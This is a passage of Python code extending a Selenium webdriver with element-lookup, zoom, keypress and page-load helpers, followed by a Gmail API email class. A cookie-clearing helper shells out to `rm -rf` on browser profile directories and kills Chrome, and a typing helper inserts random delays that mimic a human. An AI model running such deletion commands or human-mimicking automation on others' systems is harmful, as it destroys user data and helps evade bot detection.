fcn = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('CLASS_NAME', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fcss = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('CSS_SELECTOR', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fid = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('ID', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
flt = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('LINK_TEXT', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fn = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('NAME', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fplt = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('PARTIAL_LINK_TEXT', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
ftn = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('TAG_NAME', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fx = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.wait_for('XPATH', Elem, _time=_time), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fcns = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('CLASS_NAME', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fcsss = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('CSS_SELECTOR', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fids = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('ID', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
flts = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('LINK_TEXT', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fns = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('NAME', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fplts = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('PARTIAL_LINK_TEXT', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
ftns = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('TAG_NAME', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
fxs = lambda self, Elem, _time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.wait_fors('XPATH', Elem, _time=_time))(webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
up = lambda self, x=1: binded_list([self.key(Keys.UP) for i in range(x)])(webdriver = self)
down = lambda self, x=1: binded_list([self.key(Keys.DOWN) for i in range(x)])(webdriver = self)
left = lambda self, x=1: binded_list([self.key(Keys.LEFT) for i in range(x)])(webdriver = self)
right = lambda self, x=1: binded_list([self.key(Keys.RIGHT) for i in range(x)])(webdriver = self)
enter = lambda self, x=1: binded_list([self.key(Keys.ENTER) for i in range(x)])(webdriver = self)
zoom_out = lambda self, x=10: binded_list([self.execute_script, [(self.ctrlkey('-'), self.cmdkey('-')) for i in range(x)]])(webdriver = self)
def zoom_level(self, level = GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL):
chrome_levels = [33, 50, 67, 80, 90, 100, 110, 125, 133, 150, 175, 200, 250, 300, 400, 500, 25] # edited
firefox_levels = [30, 50, 67, 80, 90, 100, 110, 120, 133, 150, 170, 200, 240, 300]
if self.driver_type == "firefox":
self.zoom_out(len(firefox_levels))
self.zoom_in(level)
elif self.driver_type == "chrome":
chrome_level = chrome_levels[level]
self.execute_script("document.body.style.zoom='{}%'".format(chrome_level))
elif self.driver_type == "phantomjs":
pass
time.sleep(1)
time.sleep(1)
return self
set_zoom_level = lambda self, x: [setattr(self, "zoom_level_idx", x), self.zoom_level(self.zoom_level_idx), self][2]
zoom_in = lambda self, x=1: binded_list([(self.ctrlkey('='), self.cmdkey('='), time.sleep(0.5)) for i in range(x)])(webdriver = self)
tab = lambda self, x=1, s=1: binded_list([[self.key(Keys.TAB), zz(s)] for i in range(x)])(webdriver = self)
key = lambda self, keys: [ActionChains(self).send_keys(keys).perform(), self][1]
ctrlkey = lambda self, keys: [ActionChains(self).key_down(Keys.CONTROL).send_keys(keys).key_up(Keys.CONTROL).perform(), self][1]
cmdkey = lambda self, keys: [ActionChains(self).key_down(Keys.COMMAND).send_keys(keys).key_up(Keys.COMMAND).perform(), self][1]
pagestop_timeout = lambda self: [self.ftn("body").send_keys(Keys.ESCAPE), self][1]
handle_alert = lambda self, x=True: [tryprocess(Alert(self).accept) if x == True else tryprocess(Alert(self).dismiss), self][1]
clear_cookies = lambda self, profile: [os.system("rm -rf ~/Library/Application\ Support/Firefox/Profiles/{}/cookies*".format([i for i in os.listdir(GLOBAL_FIREFOX_PROFILE_PATH) if i.split(".")[-1] == profile][0]))if("ch"!=profile)else([os.system("killall Google\ Chrome &>/dev/null"), time.sleep(1), os.system("rm -rf '~/Library/Application Support/Google/Chrome/Profile 1000'"), time.sleep(1), os.system("/Applications/Google\ Chrome\ 70.app/Contents/MacOS/Google\ Chrome --args --profile-directory=Profile\ 1000 &>/dev/null &"), time.sleep(1), os.system("/usr/bin/killall Google\ Chrome &>/dev/null &"), process(lambda: [time.sleep(1), os.system("/usr/bin/killall Google\ Chrome &>/dev/null &")])]), self][1]
whippin = lambda self: self
def space(self):
self.key(self.Keys.SPACE)
return self
def ffs(self,tag,attr,value, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, GLOBAL_VARIABLE = None):
start_time = datetime.now()
if (None==GLOBAL_VARIABLE):
GLOBAL_VARIABLE = generate_one_random_number(20)
globals()[GLOBAL_VARIABLE] = start_time
tags = self.find_elements_by_tag_name(tag)
for e in tags:
try:
if e.get_attribute(attr) == value:
R = bind_more(e, webdriver = self)
self.batterypack.append(R)
return R
except: pass
if (datetime.now() - globals()[GLOBAL_VARIABLE]).seconds < _time:
return self.ffs(tag = tag, attr = attr, value = value, _time = _time, GLOBAL_VARIABLE = GLOBAL_VARIABLE)
assert False
def ffss(self,tag,attr,value, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, GLOBAL_VARIABLE = None):
start_time = datetime.now()
if (None==GLOBAL_VARIABLE):
GLOBAL_VARIABLE = generate_one_random_number(20)
globals()[GLOBAL_VARIABLE] = start_time
tags = self.find_elements_by_tag_name(tag)
element_list = []
for i in tags:
if i.get_attribute(attr) == value:
element_list.append(i)
if (datetime.now() - globals()[GLOBAL_VARIABLE]).seconds < _time and element_list == []:
self.ffss(tag = tag, attr = attr, value = value, _time = _time, GLOBAL_VARIABLE = GLOBAL_VARIABLE)
R = binded_list(element_list)(webdriver = self)
self.batterypack.append(R)
return R
def ffst(self, tag, text, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, GLOBAL_VARIABLE = None):
start_time = datetime.now()
if (None==GLOBAL_VARIABLE):
GLOBAL_VARIABLE = generate_one_random_number(20)
globals()[GLOBAL_VARIABLE] = start_time
tags = self.find_elements_by_tag_name(tag) # !!
for i in tags:
if (datetime.now() - start_time).seconds > 100:
print("over 100 refresh_every_x_seconds")
if input("continue? (y/n): ") == "n":
return
if i.text == text:
R = bind_more(i, webdriver = self)
redprint("APPEND")
self.batterypack.append(R)
return R
redprint("ffst return nothing so it should raise an Error/")
if (datetime.now() - globals()[GLOBAL_VARIABLE]).seconds < _time:
return self.ffst(tag = tag, text = text, _time = _time, GLOBAL_VARIABLE = GLOBAL_VARIABLE)
assert False
def ffsts(self, tag, text, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, GLOBAL_VARIABLE = None):
start_time = datetime.now()
if (None==GLOBAL_VARIABLE):
GLOBAL_VARIABLE = generate_one_random_number(20)
globals()[GLOBAL_VARIABLE] = start_time
tags = self.find_elements_by_tag_name(tag)
element_list = []
for i in tags:
if (datetime.now() - start_time).seconds > 100:
print("over 100 refresh_every_x_seconds")
if input("continue? (y/n): ") == "n":
return
if i.text == text:
element_list.append(i)
if (datetime.now() - globals()[GLOBAL_VARIABLE]).seconds < _time and element_list == []:
return self.ffsts(tag = tag, text = text, _time = _time, GLOBAL_VARIABLE = GLOBAL_VARIABLE)
R = binded_list(element_list)(webdriver = self)
self.batterypack.append(R)
return R
assert False
def bacpac(self, start = False, end = False, url = None):
(setattr(self,"bacpac_urls",[]))if(None==getattr(self, "bacpac_urls", None))else()
if start == True:
self.bacpac_urls.append(self.current_url) if self.current_url not in self.bacpac_urls else ()
if end == True:
while True:
if self.current_url not in self.bacpac_urls:
self.bacpac_urls.append(self.current_url)
print("break")
break
else:
()
if url not in self.bacpac_urls:
assert_dialog(lambda: url == self.bacpac_urls.__getitem__(-1), "current url: %s\nrequired url: %s\nsomething has changed"%(self.current_url, url))
elif url in self.bacpac_urls:
print("verified)")
()
return self
def pagedowndo(self, x, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME):
start_time = datetime.now()
for i in range(WHILE_TRUE):
if (datetime.now() - start_time).seconds > GLOBAL_BROWSER_ELEMENT_WAIT_TIME:
assert False
if(True==x()):
self.key(self.Keys.PAGE_DOWN)
else:
self.key(self.Keys.HOME)
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def arrowdowndo(self, x, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME):
start_time = datetime.now()
for i in range(WHILE_TRUE):
if (datetime.now() - start_time).seconds > GLOBAL_BROWSER_ELEMENT_WAIT_TIME:
assert False
if(True==x()):
self.key(self.Keys.ARROW_DOWN)
else:
self.key(self.Keys.HOME)
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def s_keys(self, elem, x, r1 = 0.2, r2 = 0.8):
elem.clear()
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
time.sleep(1)
for i in x:
elem.send_keys(i)
Q = random.uniform(r1, r2)
time.sleep(Q)
return self
def workable_from(self, element_list, command, *args, **kwargs):
x = lambda *args, **kwargs: command(*args, **kwargs)
attempt = trylmap(x, element_list)
return binded_list([element_list[i] for i in attempt if i == 0])(webdriver = self)
def html_test(self):
pyperclip.copy("")
open(homepath("~/tavern/tavern/test.html"),"w").write(self.page_source)
if "/Applications/Firefox\ 46.app" not in subprocess.getoutput("ps -ef | grep firefox | grep -v grep"):
os.system("/Applications/Firefox\ 46.app/Contents/MacOS/firefox-bin ~/tavern/tavern/test.html -foreground &")
time.sleep(4)
OSA("Firefox 46", ["cmd_l", "return", "delay 1"])
return self
def fxsxs(self, x):
g()["ELEMENT_LIST"] = []
GET_XPATHS = lambda R: R.find_elements_by_xpath("*")
def GET_MORE(x):
List = GET_XPATHS(x)
if List == []: return
for i in List:
g()["ELEMENT_LIST"].extend(List)
GET_MORE(i)
return g()["ELEMENT_LIST"]
GET_MORE(x)
R = binded_list(g()["ELEMENT_LIST"])
self.batterypack.append(R)
return R
def jcns(self, x, m, kws, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, tc=False):
S = datetime.now()
"""
x = "ui-button"
m = "click"
kws = {"text":"Close store"}
"""
# kws = dict(zip(args[0::2], args[1::2]))
t = self.execute_script("return document.getElementsByClassName('%s')"%(x))
l = []
for idx in list(range(len(t))):
for a,b in kws.items():
v = None
if a == "text": v = Strip(self.execute_script("return document.getElementsByClassName('%s')[%s].%s"%(x,idx,"textContent"if("text"==a)else("textContent"))))
else: v = self.execute_script("return document.getElementsByClassName('%s')[%s].getAttribute('%s')"%(x,idx,a))
if v!=b:
l.append(idx)
r = len(t)
y = sorted(set(range(r)) - set(l)) #
E = (_time-((datetime.now()-S).total_seconds()))
redprint(E)
if ((y==[])and(E>0)): return [redprint("again,%s"%E),self.jcns(x, m, kws, _time = E)][1]
elif ((y==[])and(E<=0)): return [] #
if(m==0): return [self.execute_script("return document.getElementsByClassName('%s')[%s]"%(x,idx)) for idx in y]
for idx in y:
if m == "click": self.execute_script("document.getElementsByClassName('%s')[%s].click()"%(x,idx))
else: self.execute_script("document.getElementsByClassName('%s')[%s].value = '%s'"%(x,idx,m))if(tc==False)else(self.execute_script("document.getElementsByClassName('%s')[%s].textContent = '%s'"%(x,idx,m)))
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
"""
x = "ui-button"
m = "click"
kws = {"text":"Close store"}
idx = [5]
ss.fcns(x)[5].click() # does not work @ top of page
self.execute_script("document.getElementsByClassName('%s')[%s].click()"%(x,idx)) # works @ top of page
"""
"""
ss.get("{}/settings/account".format(self.Administrative_Url))
kws = {"text":"Close store","name":"button","data-bind-event-click":"passwordConfirmationModal.show()"}
x = "ui-button"
m = "click"
# getElementsByTagName
"""
def jtns(self, x, m, kws, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, tc=False):
# added strip to text
S = datetime.now()
# kws = dict(zip(args[0::2], args[1::2]))
redprint("_time: %s, S: %s" % (_time, S))
t = self.execute_script("return document.getElementsByTagName('%s')"%(x))
l = []
for idx in list(range(len(t))):
for a,b in kws.items():
v = None
if a == "text": v = Strip(self.execute_script("return document.getElementsByTagName('%s')[%s].%s"%(x,idx,"textContent"if("text"==a)else("textContent"))))
else: v = self.execute_script("return document.getElementsByTagName('%s')[%s].getAttribute('%s')"%(x,idx,a))
if v!=b:
l.append(idx)
r = len(t)
y = sorted(set(range(r)) - set(l)) #
E = (_time-((datetime.now()-S).total_seconds()))
redprint(E)
if ((y==[])and(E>0)): return [redprint("again,%s"%E),self.jtns(x, m, kws, _time = E)][1]
elif ((y==[])and(E<=0)): return [] #
if(m==0): return [self.execute_script("return document.getElementsByTagName('%s')[%s]"%(x,idx)) for idx in y]
for idx in y:
if m == "click": self.execute_script("document.getElementsByTagName('%s')[%s].click()"%(x,idx))
else: self.execute_script("document.getElementsByTagName('%s')[%s].value = '%s'"%(x,idx,m))if(tc==False)else(self.execute_script("document.getElementsByTagName('%s')[%s].textContent = '%s'"%(x,idx,m)))
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def jns(self, x, m, kws, _time = GLOBAL_BROWSER_ELEMENT_WAIT_TIME, tc=False):
S = datetime.now()
# kws = dict(zip(args[0::2], args[1::2]))
t = self.execute_script("return document.getElementsByName('%s')"%(x))
l = []
for idx in list(range(len(t))):
for a,b in kws.items():
v = None
if a == "text": v = Strip(self.execute_script("return document.getElementsByName('%s')[%s].%s"%(x,idx,"textContent"if("text"==a)else("textContent"))))
else: v = self.execute_script("return document.getElementsByName('%s')[%s].getAttribute('%s')"%(x,idx,a))
if v!=b:
l.append(idx)
r = len(t)
y = sorted(set(range(r)) - set(l)) #
E = (_time-((datetime.now()-S).total_seconds()))
redprint(E)
if ((y==[])and(E>0)): return [redprint("again,%s"%E),self.jns(x, m, kws, _time = E)][1]
elif ((y==[])and(E<=0)): return [] #
if(m==0): return [self.execute_script("return document.getElementsByName('%s')[%s]"%(x,idx)) for idx in y]
for idx in y:
if m == "click": self.execute_script("document.getElementsByName('%s')[%s].click()"%(x,idx))
else: self.execute_script("document.getElementsByName('%s')[%s].value = '%s'"%(x,idx,m))if(tc==False)else(self.execute_script("document.getElementsByName('%s')[%s].value = '%s'"%(x,idx,m)))
time.sleep(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def captcha_check(self):
lol = [i for i in self.ftns("iframe") if True == tryreturn(lambda: "https://www.google.com/recaptcha/api2" in i.get_attribute("src") )]
F = False
for i in lol:
self.frame(i)
try:
if "fail"==self.fcn("recaptcha-checkbox-checkmark",_time=2):
0/0
F= True
blueprint("F TRUE")
except:
self.dc()
continue
self.dc()
#if tryreturn(lambda: self.fcns("g-recaptcha",_time=4)) == 0:
if F:
OSA.display_dialog("There is a Google ReCaptcha on this page. Please complete the captcha and after the captcha is completed, click OK in this prompt. The captcha is complete when the check appears.\n\nIf there is no captcha, please ignore this message.",text_prompt=False)
return self
#bind = lambda obj,name,method: setattr(obj, name, MethodType(method,obj))
def tp(self, func, *args, **kwargs):
import multiprocessing
t = multiprocessing.Process(target=func, args=args, kwargs=kwargs)
#t = multiprocessing.Process(target=func)#, args=args, kwargs=kwargs)
try:
t.run()
return self
except Exception as e:
#OSA.notify("%s, %s, %s" % (str(func), str(args), str(kwargs)))
#OSA.notify("tryprocess: " + str(e))
#pyperclip.copy(str(e))
return self
def sp(self, x):
time.sleep(x)
return self
for k,v in locals().items():
try: bind(wd, k, v)
except: pass
[wd.set_window_index(window_index[0],window_index[1],window_index[2],window_index[3]),setattr(wd,"zoom_level_idx",GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL)]if(window_index!=None and type(window_index)is(list))else(setattr(wd,"zoom_level_idx",window_index))if(window_index!=None and type(window_index)is(int))else(setattr(wd,"zoom_level_idx",GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL))
# :tmp bricks:
#if window_index and type(window_index) is list:
# wd.set_window_index(window_index[0],window_index[1],window_index[2],window_index[3])
# wd.zoom_level_idx = GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL
#elif window_index and type(window_index) is int:
# wd.zoom_level_idx = window_index
#else:
# wd.zoom_level_idx = GLOBAL_BROWSER_PAGEGOT_ZOOM_LEVEL
def p(self,*args,**kwargs):
distinct_print(*args,**kwargs)
return self
bind3(wd,p)
def get_element_attributes(self, element):
attrs = self.execute_script('var items = {}; for (index = 0; index < arguments[0].attributes.length; ++index) { items[arguments[0].attributes[index].name] = arguments[0].attributes[index].value }; return items;', element)
return binded_list(attrs)(webdriver = self)
bind3(wd, get_element_attributes)
wd.execute_script1 = wd.execute_script
# :tmp bricks:
# def execute_script(self, script):
# return [self.execute_script1(script), self][1]
# bind3(self, execute_script) # you can return a string with this. so, don't bind
wd.es = wd.execute_script
wd.refresh1 = wd.refresh
def refresh(self):
try:
self.refresh1()
self.zoom_level(level=self.zoom_level_idx)
except Exception as e:
e
# timeout
self.ftn("body").send_keys(Keys.ESCAPE)
return self
bind3(wd, refresh)
wd.get1 = wd.get
wd
wd.delete_all_cookies1 = wd.delete_all_cookies
delete_all_cookies = lambda self: [self.delete_all_cookies1(), self][1]
bind3(wd, delete_all_cookies)
def dc(self):
self.switch_to_default_content()
return self
bind3(wd, dc)
def frame(self, x):
self.switch_to_frame(x)
return self
bind3(wd, frame)
wd.switch_to_frame1 = wd.switch_to_frame
def switch_to_frame(self, x):
self.switch_to_frame1(x)
return self
wd.batterypack = []
wd.imko_on = False
wd.SHADOW = SHADOW
for i in wd.Keys.__dict__:
if not i.startswith("_"):
setattr(wd, i, eval("""lambda element: element.send_keys("%s")""" %(Keys.__dict__[i])) )
def get(self, url, timeout = GLOBAL_BROWSER_GET_PAGE_WAIT_TIME, **kwargs):
"""
if self.current_url == url:
tryprocess(lambda: self.ftn("body").send_keys(Keys.ESCAPE))
self.refresh()
return self
"""
# Proc return so not load page twice
if(0==url.startswith("http")): url="https://%s"%url
try:
self.set_page_load_timeout(timeout)
# [may not require] self.set_page_load_timeout(timeout) # so also have to deset it or else every get
start_time = datetime.now()
get_url_process = multiprocessing_process(lambda: self.get1(url))
# A. Get the url, do not wait.
# B. Start a sleep checker that terminates and ends.
# C.
# timeout_checker = multiprocessing_process(lambda: [time.sleep(timeout), get_url_process.terminate(), self.ftn("body").send_keys(self.Keys.ESCAPE)])
while True:
print("running while true anyways")
if get_url_process.is_alive() == True and ((datetime.now()-start_time).seconds < timeout):
time.sleep(0.25)
None
print(":A", (datetime.now()-start_time).seconds)
elif get_url_process.is_alive() == True and ((datetime.now()-start_time).seconds >= timeout):
time.sleep(0.25)
redprint("Terminating")
get_url_process.terminate()
redprint("get url process status: %s" % get_url_process.is_alive())
redprint("sending keys")
self.ftn("body").send_keys(Keys.ESCAPE)
redprint("sent keys")
print(":B", (datetime.now()-start_time).seconds)
elif get_url_process.is_alive() == False and ((datetime.now()-start_time).seconds < timeout):
time.sleep(0.25)
None
break
print(":C", (datetime.now()-start_time).seconds)
elif get_url_process.is_alive() == False and ((datetime.now()-start_time).seconds >= timeout):
time.sleep(0.25)
None
break
print(":D", (datetime.now()-start_time).seconds)
except Exception as e:
#redprint("[page_stop timeout][%s]"%e)
redprint("pageload escape")
while True:
if 0 == tryprocess(lambda: self.ftn("body").send_keys(Keys.ESCAPE)):
self.pagestop_timeout()
return self.get(url, timeout=timeout, **kwargs)
time.sleep(GLOBAL_BROWSER_PAGEGOT_WAIT_TIME)
self.zoom_level(level = self.zoom_level_idx)
# add image_compare_image here just to ensure pagegot rules
# if self.imko_checker == True:
# self.imko(part = kwargs.get("imko_part", 0))
return self
globalise(wd,"ss_v")
bind3(wd, get)
if "ch" in profile:
wd.delete_all_cookies()
if GLOBAL_BROWSER_REQUIRE_SPEEDTEST == True:
speedtest.result()
return wd
class Browser(Bowser):
""
class Emailer(object):
def get_credentials(self):
#os.makedirs(credential_path, exist_ok=True)
q = "." + "|".join([self.user, "Client_Secret_2", "GSuite"]) + ".json"
qq = "." + "|".join([self.user, "Client_Secret", "GSuite"]) + ".json"
store = oauth2client.file.Storage(homepath("~/tavern/tavern/soda/%s"%q))
print("store: %s" % store)
if q in key("filename", All(Binarydata)):
Binarydata().export(q, homepath("~/tavern/tavern/soda/%s"%q))
try:
credentials = store.get()
print("credentials: %s"%credentials)
except Exception as e:
print(e)
if 'credentials' not in locals().keys():
# the credentials here must be downloaded
Binarydata().export(qq, homepath("~/tavern/tavern/soda/%s"%(qq)))
flow = client.flow_from_clientsecrets(homepath("~/tavern/tavern/soda/%s"%(qq)), 'https://mail.google.com/')
flow.user_agent = 'Gmail API Python Send Email'
OSA.display_dialog("Your browser will be opened to authenticate credentials for gmail api. Please click OK here, your browser will open a new window. Please sign in, you will see a window that says \"%s wants to access your Google Account\". Please click Allow.\n\nNote: The same process will occur again to authenticate credentials to the google drive api." % (self.user), text_prompt = False, buttons = ["OK"])
credentials = tools.run_flow(flow, store)
print('Storing credentials to %s'%homepath("~/tavern/tavern/soda"))
if not credentials or credentials.invalid:
# the credentials here must be downloaded
Binarydata().export(qq, homepath("~/tavern/tavern/soda/%s"%(qq)))
flow = client.flow_from_clientsecrets(homepath("~/tavern/tavern/soda/%s"%(qq)), 'https://mail.google.com/')
flow.user_agent = 'Gmail API Python Send Email'
OSA.display_dialog("Your browser will be opened to authenticate credentials for gmail api. Please click OK here, your browser will open a new window. Please sign in, you will see a window that says \"%s wants to access your Google Account\". Please click Allow." % (self.user), text_prompt = False, buttons = ["OK"])
credentials = tools.run_flow(flow, store)
print('Storing credentials to %s'%homepath("~/tavern/tavern/soda"))
if q not in key("filename", All(Binarydata)):
os.chdir(homepath("~/tavern/tavern/soda/"))
Binarydata().update_or_create(q)
self.credentials = credentials
def set_service(self):
http = self.credentials.authorize(httplib2.Http())
service = discovery.build('gmail', 'v1', http=http)
self.service = service
def init(self, user):
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from oauth2client.file import Storage
from oauth2client import client, tools
from apiclient import discovery
import oauth2client
import mimetypes
import httplib2
globals().update(locals())
self.user = user
#self.credential_path = '%s/%s.json' % (credential_path, user.split('.com')[0])
#print(self.credential_path)
try:
self.__dict__.update(locals())
self.get_credentials()
self.set_service()
self.m = self.service.users().messages()
self.a = self.service.users().messages().attachments()
self.t = self.service.users().threads()
print(self.m,self.a,self.t)
except:
if GLOBAL_EMAILER_INITIALIZE_ERROR_MESSAGE:
OSA.log("Unable to initiate Emailer.",tp=False)
else:
return
def initiate_2(self,user):
user = "support@steampunkstop.com"
file = ".%s|Gmail_Client_Secret.pickle"%(user)
# below commented out
# from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from oauth2client.file import Storage
from oauth2client import client, tools
from apiclient import discovery
import oauth2client
import mimetypes
import httplib2
import base64
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://mail.google.com/']
def main():
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
# Try To Export The File
tp(lambda:Binarydata().export(file))
""" Here, use file as the file address """
if os.path.exists(file):
""" Here, use file as the file address """
with open(file, 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
# if not creds or not creds.valid:
if not creds:
""" Here, make sure you have the credentials file. ~/tavern/tavern/credentials.json """
OSA().log("Here, make sure you have the credentials file. ~/tavern/tavern/credentials.json.")
shop = OSA().log("Which shop is this for? Enter the shop abbreviation")
Shop()(shop).GET_GOOGLE_API_PROJECT(user) # saves the credentials.json first and then calls Emailer which will use the credentials.json and save the authenticated pickle file.
return Emailer().initiate_2(user)
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
""" Here, use file as the file address """
with open(file, 'wb') as token:
pickle.dump(creds, token)
""" Here, use file as the file address """
Binarydata().update_or_create(file)
service = build('gmail', 'v1', credentials=creds)
# Call the Gmail API
results = service.users().labels().list(userId='me').execute()
labels = results.get('labels', [])
if not labels:
print('No labels found.')
else:
print('Labels:')
for label in labels:
print(label['name'])
return service
return main()
def set_services_initiate_2(self,user):
service = self.initiate_2(user)
self.service = service
self.m = self.service.users().messages()
self.a = self.service.users().messages().attachments()
self.t = self.service.users().threads()
print(self.m,self.a,self.t)
return self
def remove_labels(self, id, labels=['UNREAD']):
return self.m.modify(userId='me', id=id, body={'removeLabelIds':labels}).execute()
def delete_message(self, id):
x = self.t.delete(userId='me', id=id).execute()
blueprint("deleted: %s" % x)
return x
def set_messages(self, count = 50):
messages = []
original_messages = []
data = []
nextpagetoken = None
idx = 0
msg_datas = None
try:
while True:
print(nextpagetoken)
if nextpagetoken is not None:
msg_datas = self.m.list(userId='me', pageToken=nextpagetoken).execute()
elif nextpagetoken is None:
msg_datas = self.m.list(userId='me').execute()
if msg_datas == {'resultSizeEstimate': 0}:
self.messages = []
OSA.notify("No messages")
return
print(msg_datas['messages'])
print("getting more messages... idx: %s" % idx)
data.extend(msg_datas.pop('messages', []))
if 'nextPageToken' not in msg_datas.keys():
break
else:
nextpagetoken = msg_datas['nextPageToken']
idx += 1
break # works better w/ this ?
except Exception as e:
print("error: %s" % (e))
print("len data: %s" % len(data))
""" ::: Ticket is removed as of now ::: """
#existing_threads = [i.id for i in Ticket.objects.all()]
#data = [i for i in data if i['id'] not in existing_threads]
print("len new data: %s" % len(data))
print("len data: %s"% len(data))
errors = 0
"""
count=100
"""
data = data[:count]
true_ids = set()
messages_in_without = []
messages_in_without2 = []
for idx, msg in enumerate(data):
#@risky to pool api calls.
try:
# try:
# x = Emit.objects.get(true_id=msg['id'])
# redprint("[Emit.objects.get(true_id=msg['id'])] [Exists] -- ending set more messages [%s]"%msg['id'])
# #return
# except Exception as e:
# redprint("[current message id][%s][not found in Emit.objects.all()][so saving this message as a new Emit], %s"%(msg["id"],e))
print("getting message %s out of %s" % (idx+1, len(data)))
initial_data = self.m.get(userId='me',id=msg['id']).execute()
original_messages.append(initial_data)
self.original_messages = original_messages
header_data = initial_data['payload']['headers']
msg_data = {}
msg_data['id'] = initial_data['id']
msg_data['labelIds'] = initial_data['labelIds']
# skip any drafts.
if "DRAFT" in msg_data["labelIds"]:
redprint("Skipping Draft")
continue
if "SENT" in msg_data["labelIds"]:
msg_data["direction"] = 1
elif "SENT" not in msg_data["labelIds"]:
msg_data["direction"] = 0
try:
try:
msg_data['sender'] = keyequals('name', 'Return-Path', header_data)[0]['value']
except:
msg_data['sender'] = keyequals('name', 'From', header_data)[0]['value']
try:
msg_data['sender'] = re.findall(r'<(.*)>', msg_data['sender'])[0]
except:
pass
